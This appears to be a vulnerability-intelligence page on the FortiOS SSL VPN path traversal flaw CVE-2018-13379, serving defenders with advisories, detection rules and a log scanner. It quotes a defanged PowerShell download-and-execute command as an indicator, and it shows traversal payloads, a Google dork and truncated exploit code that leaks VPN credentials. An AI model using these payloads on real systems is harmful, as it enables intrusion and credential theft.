CVE-2018-13379
Published: 2019-06-04
CVE-2018-13379: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and…
Priority: P1 (99) · Critical 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortinet | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | >= 5.4.6 < 5.4.13 | 5.4.13 |
| fortinet | fortios | >= 5.6.3 < 5.6.8 | 5.6.8 |
| fortinet | fortios | >= 6.0.0 < 6.0.5 | 6.0.5 |
| fortinet | fortiproxy | < 1.2.9 | 1.2.9 |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | — | — |
Detection & IOCs (extracted from sources)
IOC, defanged command line as quoted by a source: -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"
- CVE-2018-13379 exploitation involves specially crafted HTTP resource requests to the FortiOS SSL VPN web portal to download system files without authentication; monitor for anomalous GET requests to SSL VPN portal paths containing path traversal sequences (e.g., '../') from unauthenticated sources.
- APT29 exploited CVE-2018-13379 for FortiGate VPN initial access; hunt for unexpected VPN logins from new or dormant accounts following FortiGate access log anomalies.
- CVE-2018-13379 is among the CVEs most repeatedly exploited by ransomware actors for initial access; prioritize detection of path traversal attempts against FortiOS SSL VPN web portal endpoints.
- After CVE-2018-13379 exploitation, validate all SSL-VPN local users for expected accounts and correct email addresses; unrecognized local users may indicate post-exploitation persistence.
- Play ransomware ransom notes contain email addresses in the format [seven random characters]@gmx[.]com; use this pattern to identify Play ransomware infections in email/file system forensics.
- CVE-2018-13379 affects FortiOS 6.0.0–6.0.4, 5.6.3–5.6.7, and 5.4.6–5.4.12, and FortiProxy 2.0.0, 1.2.0–1.2.8, 1.1.0–1.1.6, and 1.0.0–1.0.7. Detection and mitigation efforts should confirm the exact affected version range before applying.
- Fortinet patched CVE-2018-13379 in May 2019 (FG-IR-18-384); systems not upgraded to patched firmware remain vulnerable. Mitigations were provided for those unable to upgrade at the time of disclosure.
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 9.1 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
CISA
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2018-13379 [CRITICAL] CWE-22 Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Vulnerability: Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Affected: Fortinet FortiOS
Fortinet FortiOS SSL VPN web portal contains a path traversal vulnerability that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-13379
Remediation Due Date: 2022-05-03
Fortinet
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
vendor_fortinet·2019-06-04·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
FG-IR-18-384: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
CVEs: CVE-2018-13379
CWEs: CWE-22
CVSS: 9.1 (critical)
Affected products: FortiOS, FortiProxy, Fortinet
Fortinet
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
vendor_fortinet·2019-06-04·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
FG-IR-20-233: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5...
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
CVEs: CVE-2018-13379
CWEs: CWE-22
CVSS: 9.1 (critical)
Affected products: FortiOS, FortiProxy, Fortinet
GHSA
GHSA-2q79-m25p-r2q3: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6
ghsa_unreviewed·2022-05-24
CVE-2018-13379 [MEDIUM] CWE-22 GHSA-2q79-m25p-r2q3: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
VulnCheck
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
vulncheck·2018·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN web portal contains a path traversal vulnerability that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf; https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-13379; https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF;
Suricata
ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)
suricata·2021-09-22·CVSS 9.1
CVE-2018-13379 [CRITICAL] ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)
ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Fortinet FortiOS/FortiProxy SSL VPN Web Portal Path Traversal (CVE-2018-13379)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fgt_lang?lang="; fast_pattern; content:"|2e 2e 2f|"; distance:0; reference:url,devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/; reference:url,github.com/milo2012/CVE-2018-13379/blob/master/CVE-2018-13379.py; reference:cve,2018-13379; classtype:attempted-admin; sid:2034005; rev:1; metadata:affected_product Fortigate, created_at 2021_09_22, cve CVE_2018_13379, deployment Perimeter, deployment Internal, confidence High, signature_severity Maj
Suricata
ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)
suricata·2019-08-14·CVSS 9.1
CVE-2018-13379 [CRITICAL] ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)
ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/remote/fgt_lang?lang=/../"; depth:35; isdataat:30,relative; fast_pattern; reference:cve,CVE-2018-13379; reference:url,blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html; classtype:attempted-admin; sid:2027883; rev:3; metadata:affected_product Fortigate, attack_target Networking_Equipment, created_at 2019_08_14, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, signature_severity Major, tag CISA_KEV, updated_at 2020_08_31, mitre_tactic_id TA0007, mitre_tactic_name Disco
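As an added example (not from this page or from any of the sources it lists), the following Python log scanner applies the same logic as the two ET rules above to HTTP access-log lines: it isolates requests for the `/remote/fgt_lang` endpoint, URL-decodes the `lang` parameter (twice, so a double-encoded `%252e%252e` is caught), and flags values that contain a `..` path segment or begin with `/`. The log format, IP addresses and the target file name are constructed placeholders; the `served` flag marks hits the server answered with 200, which a responder would triage first.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); IPs are documentation
# ranges and the traversal target is a placeholder, not a real device path.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Jan/2025:10:00:01 +0000] "GET /remote/login?lang=en HTTP/1.1" 200 1532',
    '203.0.113.10 - - [10/Jan/2025:10:00:02 +0000] "GET /remote/fgt_lang?lang=en HTTP/1.1" 200 212',
    '198.51.100.7 - - [10/Jan/2025:10:00:05 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////placeholder_file HTTP/1.1" 200 4096',
    '198.51.100.7 - - [10/Jan/2025:10:00:06 +0000] "GET /remote/fgt_lang?lang=%252e%252e%2F%252e%252e%2Fplaceholder_file HTTP/1.1" 404 0',
    '192.0.2.44 - - [10/Jan/2025:10:00:09 +0000] "GET /remote/portal?lang=fr HTTP/1.1" 403 0',
]

# Common log format: client ip, identd, user, [timestamp], "METHOD URI PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# A ".." that forms its own path segment (start or slash before, slash or end after).
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')

# Endpoint the ET rules key on.
WATCHED_PATH = '/remote/fgt_lang'


def normalise(value, rounds=2):
    """Percent-decode up to `rounds` times (stops early when stable) and fold
    backslashes to slashes so double-encoded or backslash variants are visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace('\\', '/')


def classify(line):
    """Return a finding dict for a traversal attempt against the watched endpoint,
    or None for anything else (unparseable line, other path, benign lang value)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['uri'])
    if parts.path != WATCHED_PATH:
        return None
    # parse_qs decodes once; normalise() takes a second pass for double encoding.
    lang = parse_qs(parts.query, keep_blank_values=True).get('lang', [''])[0]
    lang = normalise(lang)
    if lang.startswith('/'):
        reason = 'absolute path in lang parameter'
    elif TRAVERSAL.search(lang):
        reason = 'dot-dot segment in lang parameter'
    else:
        return None
    return {
        'ip': m['ip'],
        'timestamp': m['ts'],
        'uri': m['uri'],
        'lang': lang,
        'reason': reason,
        'served': m['status'] == '200',
    }


def scan(lines):
    """Run classify() over an iterable of log lines and collect the findings."""
    return [f for f in (classify(l) for l in lines) if f is not None]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOGS):
        flag = 'SERVED' if hit['served'] else 'blocked/failed'
        print(f"{hit['timestamp']} {hit['ip']} {hit['reason']} [{flag}] {hit['uri']}")
```

The decode-then-match order matters: the first ET rule looks for the raw bytes `2e 2e 2f` after the `lang=` marker, so a percent-encoded request would slip past it but is caught here after normalisation; pairing the two (signature on the wire, normalised check on the logs) covers both cases.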
Exploit-DB
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
exploitdb·2019-08-19·CVSS 9.1
CVE-2018-13379 [CRITICAL] Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
---
# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
require 'msf/core'
class MetasploitModule 'SSL VPN FortiOs - System file leak',
'Description' => %q{
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file
Exploit-DB
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
exploitdb·2019-08-19·CVSS 9.1
CVE-2018-13379 [CRITICAL] Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
---
# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()
def leak(host, port):
print("[!] Leak information...")
try:
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..///////
Nuclei
Fortinet FortiOS - Credentials Disclosure
nuclei·CVSS 9.8
CVE-2018-13379 [CRITICAL] Fortinet FortiOS - Credentials Disclosure
Fortinet FortiOS - Credentials Disclosure
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
Template:
id: CVE-2018-13379
info:
name: Fortinet FortiOS - Credentials Disclosure
author: organiccrap
severity: critical
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
Qualys
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
blogs_qualys·2025-05-08
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
## Table of Contents
Who is LockBit? How it Evolved and Operates
Monero: The Coin of the Realm
Patch or Mitigate Now: Critical CVEs Exploited by LockBit
Beyond Traditional Endpoints: Other Compromised Systems
Initial Access and Deployment
Conclusion
The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table with 59,975 unique bitcoin addresses and a ‘chats’ table containing over 4,400 victim negotiation messages from December 2024 to the end of April 2025.
This blog post will leverage
Tenable
Cybersecurity Snapshot: Ghost Ransomware Group Targets Known Vulns, CISA Warns, While Report Finds Many Cyber Pros Want To Switch Jobs
blogs_tenable·2025-02-21
Cybersecurity Snapshot: Ghost Ransomware Group Targets Known Vulns, CISA Warns, While Report Finds Many Cyber Pros Want To Switch Jobs
Bleepingcomputer
CISA and FBI: Ghost ransomware breached orgs in 70 countries
blogs_bleepingcomputer·2025-02-19·CVSS 6.5
[MEDIUM] CISA and FBI: Ghost ransomware breached orgs in 70 countries
## CISA and FBI: Ghost ransomware breached orgs in 70 countries
## Sergiu Gatlan
CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations.
Other industries impacted include healthcare, government, education, technology, manufacturing, and numerous small and medium-sized businesses.
"Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware," CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory released on Wednesday.
"This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizatio
Fortinet
Analysis of Threat Actor Data Posting | Fortinet Blog
blogs_fortinet·2025-01-16
Analysis of Threat Actor Data Posting | Fortinet Blog
PSIRT BLOGS
Analysis of Threat Actor Data Posting
By Carl Windsor | January 16, 2025
Affected Platforms: FortiOS 7.0.0 – 7.0.6 and 7.2.0 – 7.2.1
Impacted Users: Various
Impact: Configuration and VPN Password Exposure
Severity Level: High
Executive Summary
Fortinet is aware of a posting by a threat actor which claims to offer compromised configuration and VPN credentials from FortiGate devices. Based on our analysis, the data involved is a resharing of data from previous incidents from dates prior to November 2022 and is not related to any recent incident or advisory. The following provides factual information to help our customers better understand the situation and make informed decisions.
Threat Actor Posting
Fortinet discovered the posting on a forum via the FortiRecon Dark Web Ac
Bleepingcomputer
Hackers leak configs and VPN credentials for 15,000 FortiGate devices
blogs_bleepingcomputer·2025-01-15
Hackers leak configs and VPN credentials for 15,000 FortiGate devices
## Hackers leak configs and VPN credentials for 15,000 FortiGate devices
## Lawrence Abrams
A new hacking group has leaked the configuration files, IP addresses, and VPN credentials for over 15,000 FortiGate devices for free on the dark web, exposing a great deal of sensitive technical information to other cybercriminals.
The data was leaked by the "Belsen Group," a new hacking group first appearing on social media and cybercrime forums this month. To promote themselves, the Belsen Group has created a Tor website where they released the FortiGate data dump for free to be used by other threat actors.
"At the beginning of the year, and as a positive start for us, and in order to solidify the name of our group in your memory, we are proud to announce our first official operation: Will be
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
Greynoiseio
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now
blogs_greynoiseio·2024-10-17
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now
Unit42
Ransomware Review: First Half of 2024
blogs_unit42·2024-08-09·CVSS 9.1
CVE-2018-13379 [CRITICAL] Ransomware Review: First Half of 2024
## Ransomware Review: First Half of 2024
Amanda Tanner
Kristopher Bleich
Published: August 9, 2024
Unit42
Ransomware Review: First Half of 2024
blogs_unit42·2024-08-09
Ransomware Review: First Half of 2024
## Executive Summary
Unit 42 monitors ransomware and extortion leak sites closely to keep tabs on threat activity. We reviewed compromise announcements from 53 dedicated leak sites in the first half of 2024 and found 1,762 new posts. This averages to approximately 294 posts a month and almost 68 posts a week. Of the 53 ransomware groups whose leak sites we monitored, six of the groups accounted for more than half of the compromises observed.
In February, we reported a 49% increase year-over-year in alleged victims posted on ransomware leak sites. So far, in 2024, comparing the first half of 2023 to the first half of 2024, we see an even further increase of 4.3%. The higher level of activity observed in 2023 was no fluke.
Activity from groups like Ambitious Scorpius (distributors of Blac
Talos
Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
blogs_talos·2024-07-10
Inside the ransomware playbook: Analyzing attack chains and mapping common TTPs
Given the recent slate of massive ransomware attacks that have disrupted everything from hospitals to car dealerships, Cisco Talos wanted to take a renewed look at the top ransomware players to see where the current landscape stands.
Based on a comprehensive review of more than a dozen prominent ransomware groups, we identified several commonalities in tactics, techniques and procedures (TTPs), along with several notable differences and outliers.
Talos’ studies indicate that the most prolific ransomware actors prioritize gaining initial access to targeted networks, with valid accounts being the most common mechanism. Phishing for credentials often precedes these attacks, a trend observed across all incident response engagements, consistent with our 2023 Year in Review report. Over the pa
Trendmicro
LockBit Under the Microscope
blogs_trendmicro·2024-06-04
LockBit Under the Microscope
Ransomware
## LockBit Under the Microscope
Given LockBit's powerful malware capabilities and its strong affiliate program, organizations should keep up to date with the group's activities in order to recognize risks effectively and fend off attacks.
By: Trend Micro, Jun 04, 2024
On 19 February 2024, Operation Cronos, a targeted law-enforcement action, disrupted the business of the notorious ransomware group on the platforms associated with LockBit. The authorities used the compromised LockBit leak site to publish information about the group and its operations and to announce arrests, sanctions, the seizure of cryptocurrency, and more. As one of the priva
Fortinet
Proactive, Responsible Disclosure Is One Crucial Way Fortinet Strengthens Customer Security | Fortinet
blogs_fortinet·2024-05-03
Proactive, Responsible Disclosure Is One Crucial Way Fortinet Strengthens Customer Security | Fortinet
PSIRT BLOGS
Proactive, Responsible Disclosure Is One Crucial Way Fortinet Strengthens Customer Security
By Carl Windsor | May 03, 2024
The cybersecurity industry continues to grow and mature. As a part of this process, we must collectively raise the topic of—and discuss the need for—ethical rules for handling the disclosure of vulnerabilities, especially given the many benefits of providing such intelligence in protecting customers against cyber adversaries. Nearly all vulnerabilities that cybercriminals target today can be traced back to software coding errors. Knowing about them before they can be exploited is vital in helping organizations protect their devices, businesses, and customers.
As a driving force in the evolution of cybersecurity, we are committed to being a role model in
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
[CRITICAL] CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
Tenable
CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
blogs_tenable·2024-01-10·CVSS 8.2
[HIGH] CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
Talos
Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
blogs_talos·2023-10-11·CVSS 9.1
CVE-2023-36563 [CRITICAL] Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol
Microsoft disclosed 104 vulnerabilities in its extensive range of software and services, the most in a single Patch Tuesday since July.
What is most notable is that this batch of vulnerabilities includes 12 that are considered “critical,” nine of which are remote code execution vulnerabilities in the Layer 2 Tunneling Protocol.
Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available, making it more likely that attackers will try to exploit unpatched versions of these pieces of software. However, these issues are only considered “important.”
The nine Layer 2 Tunneling Protocol vulnerabilities all requir
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
#### Table of Contents
- References
- Additional Contributor
A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realizatio
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continues to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
Fortinet
Meet LockBit: The Most Prevalent Ransomware in 2022 | FortiGuard Labs
blogs_fortinet·2023-07-10
Meet LockBit: The Most Prevalent Ransomware in 2022 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Meet LockBit: The Most Prevalent Ransomware in 2022
By Shunichi Imano and James Slaughter | July 10, 2023
Affected platforms: Microsoft Windows, Linux, ESXi, MacOS
Impacted parties: Microsoft Windows, Linux, ESXi, and MacOS Users
Impact: Encrypts and exfiltrates victims’ files and demands ransom for file decryption and not to leak stolen files
Severity level: High
On June 14th, 2023, the CISA, FBI, MS-ISAC, and multiple international cyber security organizations released a joint advisory for the LockBit ransomware. This ransomware group has been active since early 2020, targeting organizations across numerous industries, including energy and government sectors. According to the advisory, LockBit was the most active ransomware in 2022.
This blog provides
Fortinet
Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign | Fortinet Blog
blogs_fortinet·2023-06-12·CVSS 9.8
CVE-2023-27997 [CRITICAL] Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign | Fortinet Blog
PSIRT BLOGS
Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign
By Carl Windsor | June 12, 2023
Affected Platforms: FortiOS
Impacted Users: Targeted at government, manufacturing, and critical infrastructure
Impact: Data loss and OS and file corruption
Severity Level: Critical
Today, Fortinet published a CVSS Critical PSIRT Advisory (FG-IR-23-097 / CVE-2023-27997) along with several other SSL-VPN related fixes. This blog adds context to that advisory, providing our customers with additional details to help them make informed, risk-based decisions, and provides our perspective relative to recent events involving malicious actor activity.
The following write-up details our initial investigation into the incident that led to the discovery of this vulnerability and additi
Fortinet
Analysis of FG-IR-22-369 | Fortinet Blog
blogs_fortinet·2023-03-09·CVSS 6.7
CVE-2022-41328 [MEDIUM] Analysis of FG-IR-22-369 | Fortinet Blog
PSIRT BLOGS
Analysis of FG-IR-22-369
By Guillaume Lovet and Alex Kong | March 09, 2023
Affected Platforms: FortiOS
